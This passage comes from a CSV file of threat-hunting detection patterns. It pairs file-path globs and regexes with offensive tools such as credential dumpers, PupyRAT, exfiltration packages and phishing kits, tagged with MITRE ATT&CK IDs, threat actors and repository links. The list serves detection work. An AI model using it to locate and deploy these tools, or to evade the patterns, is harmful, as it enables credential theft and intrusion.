Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","17632" "*\Public\dcapi.dll*",".{0,1000}\\Public\\dcapi\.dll.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","17633" "*\Public\Document\SessionHunter.txt*",".{0,1000}\\Public\\Document\\SessionHunter\.txt.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","17636" "*\Public\Documents\Amnesiac*",".{0,1000}\\Public\\Documents\\Amnesiac.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","17637" "*\Public\Documents\DSInternals*",".{0,1000}\\Public\\Documents\\DSInternals.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","17638" 
"*\public\klogging.log*",".{0,1000}\\public\\klogging\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","17639" "*\Public\Music\RDPCreds.txt*",".{0,1000}\\Public\\Music\\RDPCreds\.txt.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","17640" "*\Public\panda.raw*",".{0,1000}\\Public\\panda\.raw.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","17641" "*\Public\simpleMDWD.raw*",".{0,1000}\\Public\\simpleMDWD\.raw.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","17642" "*\Public\sysMDWD.file*",".{0,1000}\\Public\\sysMDWD\.file.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","17643" "*\pupwinutils\*",".{0,1000}\\pupwinutils\\.{0,1000}","offensive_tool_keyword","pupy","PupyRAT 
is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17650" "*\pupy\external\creddump7*",".{0,1000}\\pupy\\external\\creddump7.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17651" "*\pupyx64.dll*",".{0,1000}\\pupyx64\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - 
T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17652" "*\pupyx64.exe*",".{0,1000}\\pupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17653" "*\pupyx64d.exe*",".{0,1000}\\pupyx64d\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17654" "*\pupyx86.dll*",".{0,1000}\\pupyx86\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17655" "*\pupyx86.exe*",".{0,1000}\\pupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17656" 
"*\pupyx86d.exe*",".{0,1000}\\pupyx86d\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17657" "*\PurpleSharp.exe*",".{0,1000}\\PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","17658" "*\PurpleSharp.exe*",".{0,1000}\\PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","17659" "*\PuTTY ppk Files.csv*",".{0,1000}\\PuTTY\sppk\sFiles\.csv.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","17660" "*\PWA-Phishing*",".{0,1000}\\PWA\-Phishing.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","17661" "*\pwdump.py*",".{0,1000}\\pwdump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","17662" 
"*\pwdump.py*",".{0,1000}\\pwdump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17663" "*\pwdump.py*",".{0,1000}\\pwdump\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","17664" "*\pwdump7*",".{0,1000}\\pwdump7.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. 
Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17665" "*\pwdump7.zip*",".{0,1000}\\pwdump7\.zip.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17666" "*\pwdump8*",".{0,1000}\\pwdump8.{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17667" "*\PWDumpX.c*",".{0,1000}\\PWDumpX\.c.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17668" "*\PWHashes.txt*",".{0,1000}\\PWHashes\.txt.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17669" "*\pwn.exe*",".{0,1000}\\pwn\.exe.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","17670" "*\pwned.txt*",".{0,1000}\\pwned\.txt.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines 
AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","17671" "*\pwnlook.exe*",".{0,1000}\\pwnlook\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","17672" "*\pwnlook35.exe*",".{0,1000}\\pwnlook35\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","17673" "*\pwnlook481.exe*",".{0,1000}\\pwnlook481\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","17674" "*\pxlib\bin\wmiexec.x86.o*",".{0,1000}\\pxlib\\bin\\wmiexec\.x86\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black 
Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","17677" "*\PyClone.py*",".{0,1000}\\PyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","17679" "*\PyExfil\pyexfil\*",".{0,1000}\\PyExfil\\pyexfil\\.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","17680" "*\Pyobfadvance*",".{0,1000}\\Pyobfadvance.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17681" "*\Pyobfexecute*",".{0,1000}\\Pyobfexecute.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17682" "*\pyobfgood*",".{0,1000}\\pyobfgood.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17683" 
"*\Pyobflite*",".{0,1000}\\Pyobflite.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17684" "*\Pyobfpremium*",".{0,1000}\\Pyobfpremium.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17685" "*\Pyobftoexe*",".{0,1000}\\Pyobftoexe.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17686" "*\Pyobfuse*",".{0,1000}\\Pyobfuse.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17687" "*\Pyobfusfile*",".{0,1000}\\Pyobfusfile.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","17688" "*\pyramid.py*",".{0,1000}\\pyramid\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - 
T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","17689" "*\pyrdp_plugin.py*",".{0,1000}\\pyrdp_plugin\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","17690" "*\pysecdump.exe*",".{0,1000}\\pysecdump\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17691" "*\pysecdump-master*",".{0,1000}\\pysecdump\-master.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","17692" "*\pysnaffler\pysnaffler\*",".{0,1000}\\pysnaffler\\pysnaffler\\.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the 
well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","17694" "*\pysoxy.py*",".{0,1000}\\pysoxy\.py.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","0","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","17695" "*\Python-Rootkit\*",".{0,1000}\\Python\-Rootkit\\.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","17696" "*\pywsus.py*",".{0,1000}\\pywsus\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","17697" "*\quantumlocker.html*",".{0,1000}\\quantumlocker\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved 